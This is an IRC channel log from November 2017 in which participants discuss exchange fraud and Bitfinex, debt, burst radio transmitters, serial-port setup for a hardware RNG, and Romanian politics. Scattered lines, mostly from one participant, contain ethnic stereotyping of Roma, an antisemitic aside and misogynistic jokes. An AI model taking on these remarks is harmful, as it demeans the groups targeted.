1732265;1509654695;a111;Logged on 2017-11-02 19:46 asciilifeform: another is to mimic a common source of crapola, e.g. defective electric motors. 1732266;1509654729;asciilifeform;ain't no miracles, nothing is crossing ocean without some palpable wattage 1732267;1509654740;asciilifeform;( how much suffices, is open to question ) 1732268;1509654744;mircea_popescu;right. 1732269;1509654945;asciilifeform;fwiw su illegals in 1950s all had burst encoders ( punched tape ) , song starts and finishes in few sec. but otoh they did not need to shout across ocean, but only to nearest sovembassy. 1732270;1509655186;asciilifeform;http://www.cryptomuseum.com/spy/r350/burst.htm << photo of subj 1732271;1509657803;lobbes;http://btcbase.org/log/2017-11-02#1732242 << shit. So it is. Looks like I fail the intelligence test, as per: http://btcbase.org/log/2017-11-02#1732028 1732272;1509657803;a111;Logged on 2017-11-02 20:14 mircea_popescu: http://btcbase.org/log/2017-11-02#1731835 << it's literally in ben_vulpes 's paste homepage! 1732273;1509657803;a111;Logged on 2017-11-02 18:36 mircea_popescu: whole fucking point of intelligence is not to miss. 1732274;1509657810;lobbes;http://btcbase.org/log/2017-11-02#1732246 << because one day the $item-I-am-excepting will be $no-longer-the-item-I-should-be-excepting? 1732275;1509657810;a111;Logged on 2017-11-02 20:18 mircea_popescu: http://btcbase.org/log/2017-11-02#1731848 << a word to the wise, don't bake exceptions in. 1732276;1509657993;lobbes;And if that is the case, couldn't it be mitigated through not having the exceptions baked into code, but rather in a separate 'exception list' that can be altered easily? 1732277;1509658022;lobbes;I'll bbl. Meatworld calls 1732278;1509658033;ben_vulpes;lobbes: also look into wget; curl's been...swiss cheese of late 1732279;1509660328;jurov;ben_vulpes: also http://explo.yt/post/2016/03/02/Wget-malignant-featuritis 1732280;1509660400;ben_vulpes;oh dear 1732281;1509660402;ben_vulpes;yeah i forgot about that 1732282;1509661107;BingoBoingo;!~ticker --market all 1732283;1509661119;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7055.11, vol: 27919.80860287 | Bitfinex BTCUSD last: 7055.8, vol: 100610.28812863 | Kraken BTCUSD last: 7085.0, vol: 7590.82131927 | Volume-weighted last average: 7057.28682008 1732284;1509661136;BingoBoingo;Ah, crashing continues apace 1732285;1509665798;asciilifeform;in other upstacks, http://www.w1hkj.com/modes/index.htm << rf encodings zoo. 1732286;1509667295;asciilifeform;in very other vintagelulz, http://www.alternatewars.com/WW3/Trigons/Trigons.htm 1732287;1509667314;asciilifeform;^ detritus from usg war games of 20th c. 1732288;1509682978;BingoBoingo;!~bcstats 1732289;1509682979;jhvh1;BingoBoingo: Current Blocks: 492882 | Current Difficulty: 1.452839779145E12 | Next Difficulty At Block: 493919 | Next Difficulty In: 1037 blocks | Next Difficulty In About: 1 week, 0 days, 6 hours, 56 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1732290;1509688090;mircea_popescu;𐋎 1732291;1509688110;mircea_popescu;aw damn i thought logotron gets the utf points whatever 1732292;1509690235;deedbot;http://trilema.com/2017/macedonia-visual-quesos-de-turrialba-rios-de-costa-rica-el-volcan-irazu-la-tarantula-vial-otras-temas-y-mas/ << Trilema - Macedonia visual : Quesos de Turrialba ; Rios de Costa Rica ; El Volcan Irazu ; La Tarantula Vial ; Otras Temas ; y mas! 1732293;1509690962;mircea_popescu;http://btcbase.org/log/2017-11-02#1732274 << not exactly. exception becomes semantically meaningful, then others end up building applications on the meaning, then you're stuck supporting unintended downstreams. 1732294;1509690962;a111;Logged on 2017-11-02 21:23 lobbes: http://btcbase.org/log/2017-11-02#1732246 << because one day the $item-I-am-excepting will be $no-longer-the-item-I-should-be-excepting? 1732295;1509691054;mircea_popescu;and in other youtful loves, http://i.imgur.com/9SWvWza.jpg 1732296;1509696857;davout;http://btcbase.org/log/2017-11-01#1731791 <<< i missed that, and no i see no problem with that. selling stuff that doesn't exist yet happens all the time in the regular course of business 1732297;1509696857;a111;Logged on 2017-11-01 19:11 asciilifeform: davout: no problem with selling items that may or may not exist or have any connection whatsoever to reality ?! 1732298;1509696911;davout;aka promises aren't in themselves fraudulent because they are promises, failure to deliver on the promise is fraudulent 1732299;1509700394;davout;bottom line being, i do think buttfinex is fraudlent, but for different reasons than this particular one 1732300;1509710731;mircea_popescu;davout you're confusing things. 1732301;1509710828;mircea_popescu;"stuff that doesn't exist yet" in the sense of the milking of tomorrow when you own a cow is not "stuff that doesn't exist yet" in the sense of davout's isp that davout neither owns nor will but for 0 reasons feels within himself a swelling indicating that he's just as good as one who does, and therefore in a small manner, as if by contagion, he also will. because he "could". 1732302;1509710899;mircea_popescu;yes futures exist, as a financial derivative. no the millenials' meat isn't worth money "because human rights and democrcy" ; nor has argentina's masfuturo a financiable value. 1732303;1509711254;mircea_popescu;the specific item here discussed is an EXACT rehash of say ttp://trilema.com/2012/and-another-one-bites-the-dust-bitmarketeu/#selection-55.0-57.87 ; which while 5 years old is nevertheless entirely identical ; which is the problem here -- that a specific sort of "mind" keeps making a specific sort of mistake. which is why all the discussions about http://trilema.com/2013/the-story-of-pointless-and-witless/ and so on and so fo 1732304;1509711254;mircea_popescu;rth. 1732305;1509711459;mircea_popescu;now -- it's fine for you to sorta-kinda keep up with the logs, now and again, and trade off the credit you built historically. nobody gives a shit, per se, people have been failing to keep up and getting shedded off like so much dead skin ever since day 1. 1732306;1509711460;mircea_popescu;the problem, however, seems to be that your mind is actually regressing to the mean, and you find yourself in 2017 making the type of arguments you'd have readily recognized as an idiot's (not even a scammer's ; some people are too dumb to actually scam in that they have not the intelligence required to create a space between themselves and their victims, so they're just fucking everyone over without mens rea for lack of a m 1732307;1509711460;mircea_popescu;ens in the first place) back in 2012. 1732308;1509711520;mircea_popescu;this can only come to grief ; and the name of the griefbox is "why is mp so arrogant ; we don't yet know whether it was a scam ; this looks like a serious business because aeron chairs" and other such nonsense amply and insistently documented years ago back when i still vaguely gave a shit about what idiots say and how the idiot brainbox works. 1732309;1509711697;asciilifeform;http://btcbase.org/log/2017-11-03#1732302 << speaking of 'mas futuro' , the 'btc in ar' scamola apparently back from the grave, https://archive.is/LUSVz 1732310;1509711697;a111;Logged on 2017-11-03 12:08 mircea_popescu: yes futures exist, as a financial derivative. no the millenials' meat isn't worth money "because human rights and democrcy" ; nor has argentina's masfuturo a financiable value. 1732311;1509711710;mircea_popescu;i'm sure. 1732312;1509711939;shinohai;gm #trilema 1732313;1509711978;shinohai;Buttfunex not a corral full of thieves ? Am I in the wrong place? 1732314;1509712504;asciilifeform;http://btcbase.org/log/2017-11-03#1732303 <<< >>> http://btcbase.org/log/2013-12-25#431168 1732315;1509712504;a111;Logged on 2017-11-03 12:14 mircea_popescu: the specific item here discussed is an EXACT rehash of say ttp://trilema.com/2012/and-another-one-bites-the-dust-bitmarketeu/#selection-55.0-57.87 ; which while 5 years old is nevertheless entirely identical ; which is the problem here -- that a specific sort of "mind" keeps making a specific sort of mistake. which is why all the discussions about http://trilema.com/2013/the-story-of-pointless-and-witless/ and so on and so fo 1732316;1509712504;a111;Logged on 2013-12-25 21:01 asciilifeform: borrowed -> has to be repaid. in cash, or фуфло. 1732317;1509712519;asciilifeform;seems to me that it is exactly same item. 1732318;1509712565;mircea_popescu;yes but the pantsuitistan theory is that poverty is an absolute bar to cash repayment and "human rights" are an absolute bar to фуфло repayment and consequently repayment obligation discharged, problem ?! 1732319;1509712588;mircea_popescu;because if problem they'll change "discharged" with "deferred" and nyah nyah. 1732320;1509712633;asciilifeform;how do you say 'долг платежом красен' proverb in eng. 1732321;1509712654;asciilifeform;( approx 'the beautiful thing about debt, is that it WILL be paid' ) 1732322;1509712712;mircea_popescu;the whole "western world" is built on the hope that nope. 1732323;1509712769;asciilifeform;this only worx because they've dressed ordinary tribute collection as 'borrowing', and ordinary mongol rape as 'lending' 1732324;1509712866;asciilifeform;if usg 'borrows' something from me, i dun expect to see it again 'like own ears without mirror', because mother did not drop me as a child 1732325;1509712866;mircea_popescu;actually, that only works because the chinese are playing the role of romanian student's mother, sending over lunchboxes fulla pork and beans without economic counterprestation, accepting self-issued "certificates" in lieu of payment. 1732326;1509712906;asciilifeform;i still dun fully grasp the middle kingdom's 'feed the enemy until he dies of old age' philosophy, so cannot comment 1732327;1509712907;mircea_popescu;the rest of the "balance sheet", two bit gainarii / trading of stolen phones and classmates' inept sexwork is entirely spurious nonsense bolted on 1732328;1509712922;mircea_popescu;asciilifeform it works fucking admirably though, compared to the soviet approach... 1732329;1509712931;mircea_popescu;or the arab approach at that. 1732330;1509713022;asciilifeform;is a 'gainar' a chicken-snatcher ? 1732331;1509713068;*;asciilifeform was floored by the abundance of free-ranging chickens, of high apparent quality, walking around in timis 1732332;1509713112;asciilifeform;walk a few km, hear 2 or 3 kukareku's 1732333;1509713251;mircea_popescu;diana_coman http://p.bvulpes.com/pastes/qZado/?raw=true 1732334;1509713253;mircea_popescu;!!up manamex 1732335;1509713254;deedbot;manamex voiced for 30 minutes. 1732336;1509713264;mircea_popescu;asciilifeform hang on, i have a discussion somewhere 1732337;1509713272;asciilifeform;meanwhile i found it 1732338;1509713281;asciilifeform;http://btcbase.org/log/2017-07-12#1681804 1732339;1509713281;a111;Logged on 2017-07-12 03:27 mircea_popescu: amusingly -- the chicken stealer (ro gainar, each language that saw them has its own word) is the lowest level of gypsy male qualification. a sort of transient baccalaureat if you will. 1732340;1509713284;mircea_popescu;ah ok then. basically young gypsy's pons asinorum 1732341;1509713287;mircea_popescu;there you go. 1732342;1509713328;asciilifeform;another poverty of englisch, it dun have a rich set of names for types of thief ( if it did ? long forgotten ? ) 1732343;1509713344;asciilifeform;can't directly say, e.g., конокрад 1732344;1509713368;asciilifeform;there is, i suppose, 'rustler' 1732345;1509713369;mircea_popescu;it did. including for the feminist (ugly tomboyis streetwalker that hates men) and for the woman in tech (pickpocket distracting the mark by playing the whore) and so on. 1732346;1509713384;mircea_popescu;but... meanwhile "they sanitized the slums", resulting in social sterility. 1732347;1509713565;asciilifeform;i dun think anyone remembered to tell the slums they've been 'sanitized' 1732348;1509713588;asciilifeform;( oblig http://btcbase.org/log/2016-12-07#1579090 ) 1732349;1509713588;a111;Logged on 2016-12-07 15:31 asciilifeform: 'well ~i~! know now that i'm not an acorn. but do THE SQUIRRELS know??????' 1732350;1509713632;mircea_popescu;!#s "five points" 1732351;1509713632;a111;2 results for "\"five points\"", http://btcbase.org/log-search?q=%22five%20points%22 1732352;1509713649;mircea_popescu;ok, well, there was once a place in new york worth going to. meanwhile... 1732353;1509713696;mircea_popescu;"clean the slums" very specifically means -- an effort by the early pantsuit to remove local autonomy from the poor. yes they'll be just as poor -- the important point is to make sure the landlord is one of us not one of them. 1732354;1509713726;asciilifeform;this is the exact colonization algo, tho, applied domestically 1732355;1509713730;mircea_popescu;yup. 1732356;1509713784;mircea_popescu;the situation where manhattan may well be run by goldman sach's own boss tweed but five points is run by will poole and dontcha forget it is well anathema to the democrat corruption machine. 1732357;1509713802;mircea_popescu;!#s "know nothing" 1732358;1509713802;a111;106 results for "\"know nothing\"", http://btcbase.org/log-search?q=%22know%20nothing%22 1732359;1509713826;mircea_popescu;turns out there's a lot of interesting us history "nobody ever knew". 1732360;1509713835;asciilifeform;this 'sanitization' btw is how they wrecked the cities, why larger part of bmore looks like dresden '45 1732361;1509713895;asciilifeform;and plenty of folx knew. but it is exactly same picture as in mircea_popescu's 'vina batranilor' 1732362;1509713921;asciilifeform;http://trilema.com/2010/vina-batranilor << subj 1732363;1509713926;asciilifeform;they knew. they sat on arse. 1732364;1509713933;mircea_popescu;aha. 1732365;1509714049;asciilifeform;asciilifeform's pet many times remarked 'they knew, they watched own neighbourhoods turn into darkest africa. but never said anything to me and siblings growing up' 1732366;1509714151;mircea_popescu;the reason it is vehehehery important for the kids to keep being distracted by "technology" aka bimbophones is that ... well... if they ever were to look up from zee angry birds... 1732367;1509714294;asciilifeform;what, exactly, they'll do ? 'he'll email you his fist...' 1732368;1509714339;mircea_popescu;you never know what the kids will do. this is the definition. 1732369;1509714364;asciilifeform;sorta why they put the resources into bonsaikittenization 1732370;1509714390;mircea_popescu;"a deal can be anything" etc 1732371;1509714422;asciilifeform;but for some reason even for orc deal it is always 'house in miami' and never 'burn miami' 1732372;1509714441;asciilifeform;the vhsamerica lure still works, i have nfi why, but it worx 1732373;1509714459;mircea_popescu;orcs are slow. 1732374;1509714464;mircea_popescu;you know they're STILL visiting rome ? or venice ? 1732375;1509714478;mircea_popescu;for centuries large open air garbage dumps, yet the call of the blood calls on. 1732376;1509714483;asciilifeform;asciilifeform confessed to a cabbie that he wants to move, and cabbie looked as if asciilifeform grew a cock on his forehead 1732377;1509714510;mircea_popescu;o yeah ? you should see when asciilifeform is not asciilifeform but female 20 years his junior. WITH TITS! 1732378;1509714527;asciilifeform;then you couldn't find the signal about noise floor, lol 1732379;1509714532;asciilifeform;*above 1732380;1509715428;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/cjLi5/?raw=true 1732381;1509715538;mircea_popescu;!!pay diana_coman 1.475 1732382;1509715546;deedbot;Get your OTP: http://p.bvulpes.com/pastes/4gHY6/?raw=true 1732383;1509715687;diana_coman;mircea_popescu> orcs are slow. <- from my personal experience this is actually a rather reliable empirical measure of how much someone groks reality as is; the analogy would be as to how far away they are from it, hence how much it takes for the "light" to travel aka them to see it; for some the splendours of Rome are visible only now so they still hold today's Rome to be the greatest thing; others are still seeing the Habsburg 1732384;1509715687;diana_coman; might; or the EU ...mhm, dunno, peace; or whatever in between; at the other end one... is ahead of it so can see already where the future is 1732385;1509715728;mircea_popescu;lol, i shall agree, barb notwithstanding :DS 1732386;1509715734;diana_coman;:P 1732387;1509715882;mircea_popescu;here, a bonus for you : http://alexbrie.net/2017/10/ganduri-despre-usr-prezent-si-viitor/#comment-2776 1732388;1509715902;diana_coman;asta-i alex branza moale adica? 1732389;1509715920;mircea_popescu;fellow identieis me as you know, "scenariul pesedisto-antenist". right ? on the basis of something he's read, or w/e, encountered in his daily lyf. 1732390;1509715926;mircea_popescu;diana_coman aha! lol. 1732391;1509715928;mircea_popescu;identifies* 1732392;1509715970;mircea_popescu;in nucet, the argument is that the empirical measure described is reliable until relied upon, at which point it is unreliable immediately and without remainder. 1732393;1509715984;mircea_popescu;the thinnest of ice on the signification river. 1732394;1509715990;*;diana_coman has trouble getting herself to read past the title even, given the...vibes of the whole thing 1732395;1509716023;mircea_popescu;but why ? he, alex softcheese, a rotten reed just like milord bacon, has thought just like anyone ever thinks. 1732396;1509716029;mircea_popescu;"but for the grace of god, there think i" 1732397;1509716135;diana_coman;what grace? what think? what...I??? where?!! lol 1732398;1509716164;diana_coman;"M-am considerat nicusorist o buna bucata de vreme, pana in clipa in care mi-am dat seama de ridicolul situatiei" <- bwahahahaha 1732399;1509716189;diana_coman;well, at least there's so much more ridicule patiently waiting for him to notice it... 1732400;1509716204;diana_coman;si dai si lupta nicusorule... 1732401;1509716308;mircea_popescu;diana_coman reference to john bradford quote. 1732402;1509716322;mircea_popescu;prior, evidently, to autodafe. 1732403;1509716469;mircea_popescu;and in #trilema better homes and gardens, today's breakfast idea : cut open aguacate (green plox, not the black jewishabomination), remove seed, replace with thinly sliced blue cheese (aoc, plox, not argentinisms) and balsamic vinegar in some proportion. yum! 1732404;1509716570;diana_coman;myeah; I meant that I don't quite see the basis on which this guy "sees" the similarity; but I'll admit I was being harsh 1732405;1509716594;mircea_popescu;i'll tell you : he's heard some things, and what i say seems similar. in that sense, guess what ? it is. 1732406;1509716633;mircea_popescu;and besides, he has 0 experience interacting with only-living-romanian-billionaire ; and plenty of experience interacting with... what, irinel columbeanu ? recall the trilema foundational myth ? 1732407;1509716643;mircea_popescu;"everyday substitutes for categories as provided by tv" 1732408;1509716681;diana_coman;ahahah; I'm out of touch with whatever columbeanus are current 1732409;1509716728;diana_coman;(n.r. : Mircea, eu nu vorbesc nici la nervi cu atatea cuvinte NSFW cum ai scris tu, nu le vreau nici pe blog. Le-am sters de mana, dar un pic de atentie pe viitor poate nu strica 1732410;1509716742;mircea_popescu;yes, well... ? who knows, maybe i got paid coupla hundy by orlando nicoara. god knows everyone else did, yes ? 1732411;1509716753;diana_coman;myeah 1732412;1509716832;mircea_popescu;perhaps i hear about how they came up with terrorism bs re this latest http://btcbase.org/log/2017-09-30#1718821 ie adrian sirbu and instead of pointing at him and laughing, "ti-am zis ca ti-o sugi, fraere ???" im like all you know, impressed or something. 1732413;1509716832;a111;Logged on 2017-09-30 19:33 mircea_popescu: so after reich and slavski, stalin executed slansky, and malenkov beria to no longer bother him with the brush. 1732414;1509716848;mircea_popescu;nobody looks back in 2017 and goes "shit, someone knew how this was gonna end back in 1997" 1732415;1509716859;mircea_popescu;first of all not the "victim" of "his own success" as it's called. 1732416;1509716939;mircea_popescu;in practical terms : the spy is well advised to be polite to the doorman ; because the doorman will still have his job when the spy won't have his anymore. 1732417;1509716952;mircea_popescu;the original discussed whores, but whatever, let's talk about boys for a while. 1732418;1509718119;davout;http://btcbase.org/log/2017-11-03#1732301 <<< i honestly have nfi what you're on about this ISP thing, I don't recall ever promising anyone to deliver such a thing, or mebbe I was asleep or something? 1732419;1509718119;a111;Logged on 2017-11-03 12:07 mircea_popescu: "stuff that doesn't exist yet" in the sense of the milking of tomorrow when you own a cow is not "stuff that doesn't exist yet" in the sense of davout's isp that davout neither owns nor will but for 0 reasons feels within himself a swelling indicating that he's just as good as one who does, and therefore in a small manner, as if by contagion, he also will. because he "could". 1732420;1509718141;mircea_popescu;no breach of promise is alleged. 1732421;1509718157;mircea_popescu;at issue is the valuation of items that dun exist. 1732422;1509718174;davout;well, my point re buttfinex is that they're simply selling you promises 1732423;1509718186;mircea_popescu;retrospectively. 1732424;1509718199;davout;whether they come from their organic liquidity or from someone else's liquidity 1732425;1509718243;mircea_popescu;the way real estate trading works in uncivilised (ie, non torrens) places is that you gotta examine the ownership chain to establish whethere the owner is selling what he claims (property free and clear) or otherwise "promises". 1732426;1509718266;mircea_popescu;somehow the entire ukistan real estate market has little problem identifying the latter case as a scam. 1732427;1509718286;davout;exchanges only sell you promises, nothing else 1732428;1509718291;mircea_popescu;this is not so. 1732429;1509718335;davout;buttcoins-on-an-exchange are definitionally not buttcoins-in-your-wallet, they are promises to put buttcoins in your wallet should you ask nicely 1732430;1509718341;davout;or did i miss something? 1732431;1509718344;mircea_popescu;that much is so. 1732432;1509718396;davout;how are buttcoins-on-an-exchange different from promises from that exchange? 1732433;1509718406;mircea_popescu;that's not the issue. 1732434;1509718444;davout;so what is? 1732435;1509718455;mircea_popescu;when i go and sit down in a restaurant and ask for the menu, a certain kind of promise is made. when the waiter doesn't go to the restaurant's kitchen but across the street, sits down with my order and waits for the waiter to approach him, a different kind of thing was executed than was promised. 1732436;1509718495;mircea_popescu;yes, "going into restaurant means you'll eat food made by someone". but i didn't go into a commissions store ffs. 1732437;1509718544;davout;that's like saying because there's bread on the menu you expect bread be made in house 1732438;1509718553;mircea_popescu;if it said "homemade bread", i do. 1732439;1509718575;mircea_popescu;and incidentally the disparagement of sysco-powered pitstops is based on exactly this 1732440;1509718585;mircea_popescu;"bitch, i can buy supermarket crap on my own tyvm" 1732441;1509718586;davout;so, there's no such "homemade" mention on buttfinex's menu is exactly my point 1732442;1509718594;mircea_popescu;there can't not be. 1732443;1509718613;mircea_popescu;their simple existence (or rather, evidently fraudulent pretense to existing) is the claim whole. 1732444;1509718679;mircea_popescu;there isn't such a mention on, eg, coinmarketcap.com. which is why we aren't having this discussion about that ~useless website ; but about the useless and fraudulent bitfinex.com exact equivalent. 1732445;1509718840;davout;i still dun see 1732446;1509718856;mircea_popescu;what can i tell ye. 1732447;1509718861;mod6;were you around in '11 or '12? 1732448;1509718878;davout;mircea_popescu: 1732449;1509718880;mircea_popescu;mod6 he was around yes. 1732450;1509718883;davout;whoops 1732451;1509718884;davout;w 1732452;1509718912;davout;mircea_popescu: say i start selling buttcoins, is it fraudulent if i source them elsewhere? 1732453;1509718931;mircea_popescu;do you source them before you sell them or after ? 1732454;1509718963;davout;if it was the latter, would it be fraudulent just on account of me taking a risk? 1732455;1509719006;mircea_popescu;would you advertise yourself as "bitcoin seller" or as "commission-powered bitcoin hunter of future bitcoins and advisor extraordinaire evanghelizist at large" ? 1732456;1509719060;davout;my point is that taking risks isn't fraudulent if you're able to eat whatever losses you're exposing yourself to 1732457;1509719073;mircea_popescu;whenever something is taken to the marketplace under a label that doesn't match the content, fraud has been committed. 1732458;1509719082;mircea_popescu;davout your claim is false. 1732459;1509719097;davout;isn't that what the mpoe bot was essentially doing? 1732460;1509719124;mircea_popescu;rape is still a crime, even if you only indulge in it in those juridstictions where paying off the father after the fact is a legal way of extinguishing ~the claim~ against you and you're rich enough to pay more than you can fuck. 1732461;1509719144;mircea_popescu;no, and at every juncture. mpoe bot was specifically financed, by bonds deposited etc. 1732462;1509719161;davout;with a last resort payer 1732463;1509719172;mircea_popescu;yes, and advertised as such. 1732464;1509719190;davout;so you did take a risk 1732465;1509719195;mircea_popescu;so : being rich protects one from action on fraud, on the basis of being able to make restitution and only as far as that lasts. 1732466;1509719201;mircea_popescu;bitfinex evidently isn't rich enough. 1732467;1509719218;mircea_popescu;which is the problem with this "im trading fraudulently in the hopes i'm rich enough to not suffer the consequences". 1732468;1509719299;davout;their ability to face the consequences of the risks they're undertaking is not something i can meaningfully argue, i have nfi how rich they are 1732469;1509719305;mircea_popescu;and this is exactly the substance of the "will come to grief" comment. the sort of mental situation that creates the approach in the first place is generally guaranteed to eventually sink it past the point of safety. 1732470;1509719410;mircea_popescu;ie, if X thinks P = "hey, ima trade fraudulently because i'm rich enough to afford covering up for it", the probability of X later thinking P' = "undertaking excessive risk on the basis of extant capitalization is viable in spite of its obvious unviability" is high. because while P' is patently insane whereas P is merely occultly insane, nevertheless P' is just a watered down version of P and consequently "of lower psychologi 1732471;1509719410;mircea_popescu;cal pain". 1732472;1509719424;davout;i see your point 1732473;1509719456;mircea_popescu;aite then 1732474;1509719459;davout;hard to stop when it seemed so easy in the first place, even though it *was* factually safe in the first plae 1732475;1509719461;davout;*place 1732476;1509719476;mod6;i disagree. 1732477;1509719483;davout;wai 1732478;1509719563;mod6;If I place my bid, "100 BTC @ 1.00 USD", and your trade engine tells me that "Trade Executed", I expect immediate settlement/delivery. Anything else is scam. 1732479;1509719614;davout;how would that work if your trades are simple insertions recorded in a DB ? 1732480;1509719617;mod6;(unless it says otherwise, in clear, plain-text right there and I am aware that the coins that are listed on the orderbook are not actually *there*, right *now*) 1732481;1509719702;mircea_popescu;davout "immediate" doesn't mean "in so and so $magic number time interval". immediate means, without intervening steps. 1732482;1509719705;mircea_popescu;ie, absent mediation. 1732483;1509719720;davout;ftr fractional reserve is really not what i was discussing in the first place ... 1732484;1509719747;davout;bbl 1732485;1509719859;asciilifeform;who remembers the 'why not s.nsa take preorders!11' thread. 1732486;1509719869;mod6;i. 1732487;1509719875;asciilifeform;~same item. 1732488;1509719891;mircea_popescu;mno. 1732489;1509719904;mircea_popescu;same item would have been "why doesn't s.nsa claim to have an item it doesn't and sell it, like butterfly labs" 1732490;1509719916;mircea_popescu;preorders as such are a few steps closer to sanity than this. 1732491;1509719972;asciilifeform;well yes. we didn't take orders until conveyor physically rolled. 1732492;1509719995;asciilifeform;because otherwise shitfinex an' pay with фуфло. 1732493;1509720047;mircea_popescu;a deal can be anything. a stupid deal, or a deal of no economic value or relevancy, such as me offering for sale my palace on the moon, with the footnote that as far as i know there's no palaces on the moon and if there were i don't know of owning any is one thing. fraud begins later on. 1732494;1509720116;asciilifeform;the cost of selling moonpalaces is to become known as a seller of moonpalaces. 1732495;1509720139;mircea_popescu;well you don't have to do it exclusively. but sure. 1732496;1509720152;asciilifeform;!#s bob bridge builder 1732497;1509720152;a111;10 results for "bob bridge builder", http://btcbase.org/log-search?q=bob%20bridge%20builder 1732498;1509720166;asciilifeform;^ see also. 1732499;1509720255;mircea_popescu;it's entirely within the realm of the conceivable that on a long enough timeline anyone ends up selling a nonzero quantity of palaces. 1732500;1509720270;asciilifeform;the contrary would require telepathy 1732501;1509720275;mircea_popescu;THAT is what the whole "i'm rich, pay off for it" protection is for. 1732502;1509720282;asciilifeform;how else buyer and seller could possibly have exactly same notion of what is being bought and sold.. 1732503;1509720319;mircea_popescu;well, contracts. 1732504;1509720346;asciilifeform;contract doesn't come with a magical spell of +9000 literacy, unfortunately 1732505;1509720369;mircea_popescu;no ; yet you'll be amazed what feats of comprehension can be achieved with a set of 26 predefined symbols. 1732506;1509720387;mod6;haha 1732507;1509720388;asciilifeform;just as it is conceivable that , e.g., despite FG comes with schematics and agonizingly pedantic description of what it is, more than enough for martians to replicate it to last resistor, there are prolly still folx who were unpleasantly surprised 1732508;1509720395;asciilifeform;e.g. pete_dushenski and his crapple usb 1732509;1509720415;mircea_popescu;i expect he was unpleasantly surprised by apple. 1732510;1509720420;asciilifeform;i'd hope. 1732511;1509720438;asciilifeform;btw diana_coman didja ever solve the riddle re ubuntu ? 1732512;1509720517;mircea_popescu;ima go play with dogs, bbl 1732513;1509720540;mod6;c-ya 1732514;1509720677;diana_coman;asciilifeform, if you mean the usb trouble with fuckgoats it was on *centos* 1732515;1509720742;asciilifeform;aaa hm 1732516;1509720837;asciilifeform;did it resolve tho? 1732517;1509721062;asciilifeform;http://btcbase.org/log/2017-11-03#1732380 << got it ! 1732518;1509721062;a111;Logged on 2017-11-03 13:23 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/cjLi5/?raw=true 1732519;1509721871;asciilifeform;in other lollamatics, https://bitbet.us/bet/1399/bitcoin-to-top-6000-usd-in-2017/#c7559 ( blocks archiverbot , http://wotpaste.cascadianhacker.com/pastes/FTOCH/?raw=true ) >> znort finally ran-with-the-moneyz 1732520;1509721894;asciilifeform;^ pete_dushenski ( and other bbet nostalgiators ) 1732521;1509722657;diana_coman;asciilifeform, well, for various definitions of resolve; I'm satisfied that problem was as identified i.e. pl2303x vs pl2303 1732522;1509722867;asciilifeform;i prolly should note ftr, for the truly lazy, there exist serial-to-ethernet boxes. they cost roughly what FG itself costs. 1732523;1509722899;asciilifeform;( and you will radiate yer seekritrngbitz for however many kilometre ) 1732524;1509722945;asciilifeform;the other solutions, in ascending order of sanity, is to find a usb ttl dongle that works with yer kernel, a kernel that worx with mine (or other) ttl dongle, and a pc with actual serialport. 1732525;1509722959;asciilifeform;this is addressed to all fg users, not diana_coman specifically. 1732526;1509723154;asciilifeform;btw : truly, genuinely spiffy pc mobos ( e.g. pcengines 'APU' series ) have ~on-board ttl serial port pins~ 1732527;1509723180;asciilifeform;i.e. suitable for direct connection of FG. 1732528;1509723285;asciilifeform;on apu1 -- j3 and j19 1732529;1509723290;asciilifeform;( see manual ) 1732530;1509723305;diana_coman;asciilifeform, one can patch the kernel to work with both pl2303 AND pl2303x; but otherwise yes, obv is obv, either actual serial port or otherwise finding a combo that works 1732531;1509723306;asciilifeform;trinque ^ et al ( and other pcenginesists ) 1732532;1509723368;mod6;worth noting, thanks alf. 1732533;1509723394;asciilifeform;diana_coman: naive orc asciilifeform picked rs232, 1960s-era protocol, because he actually thought 'no one! will have to patch kernel', can you believe. 1732534;1509723444;asciilifeform;FG will work with, e.g., pdp8, sov. bk0010, romanian z80 clone mircea_popescu played strip poker on, but apparently not with recent pc on recent centos... 1732535;1509723505;asciilifeform;world's most compatible electrical interface short of 220v plug, apparently nao notsocompatible, because generous helpings of http://btcbase.org/log/2017-03-26#1632664 meanwhile 1732536;1509723505;a111;Logged on 2017-03-26 15:03 mp_en_viaje: basically a novel vector of imperial attack seems to be this "let's take republican items and ~EXPAND~ the downstream so that siberian river attack is then feasible". 1732537;1509723514;diana_coman;asciilifeform, hm, I should get my '80s cobra then? centos 6 is not even recent tbh; but otherwise yes, I believe re no need to patch 1732538;1509723533;asciilifeform;diana_coman: anything that knows how to eat 115200baud,8,1,noparity -- will eat FG. 1732539;1509723591;asciilifeform;schmidt-trigger inputs, low <= 2v, 2.5v <= high <= 5v , approx. 1732540;1509723603;asciilifeform;( i.e. you won't burn it unless really try ) 1732541;1509723648;asciilifeform;btw if anyone REALLY needs a 9200 baud ( or other ) baud rate, i ( or for that matter anyone ) can build a replacement cpld firmware image that makes this happen 1732542;1509723657;asciilifeform;just change the value of the divider constant . 1732543;1509723679;asciilifeform;9600 , that is, lol 1732544;1509723700;asciilifeform;or 14400 etc. 1732545;1509723716;asciilifeform;any standard baudness, look at the crystal and do the arithmetic. 1732546;1509724400;mod6;https://youtu.be/1PFBlE6Fn7U 1732547;1509724406;asciilifeform;http://www.homecomputer.de/pages/easteurope_ro.html#cobra << hilariously and unsurprisingly, ro z80 clone had better keyboard than today's 3000+ $ crapbooks etc 1732548;1509724462;asciilifeform;( not to mention more reliable and usable soft, etc ) 1732549;1509724481;diana_coman;asciilifeform, that one, yes! mine was made in-house by my father so I sort of know it more open-box than closed-box in any case 1732550;1509724547;asciilifeform;i think all 1980s micro owners remember moar the insides than outside, lol 1732551;1509724586;asciilifeform;( with possible exception of crapplemac, which even THEN came in a sealed box with nonstandard bolts etc ) 1732552;1509725236;pete_dushenski;asciilifeform: znort "finally" ran three times now. if zhe comes back again i won't be overly surprised. like how many other btc corpses, znort surely has nine lives. 1732553;1509725257;pete_dushenski;and 'ello from the pacific coast! 1732554;1509725334;pete_dushenski;i'm in ben_vulpes' neck of the woods more or less, sadly with bizniz to tend to and little opportunity to make house calls to trump's side of the border. 1732555;1509725377;mod6;hai 1732556;1509725612;ben_vulpes;generous neck 1732557;1509725655;ben_vulpes;last time i crossed the border, guard winked us through, saying, "see you in november!" 1732558;1509725992;asciilifeform;pete_dushenski: i then stand corrected : ran once, and then came back twice to fleece the incorrigible idjits 1732559;1509726019;asciilifeform;maybe will come back 3rd time to fleece the remaining ( who ? down syndrome sufferers ? ) -- or not. 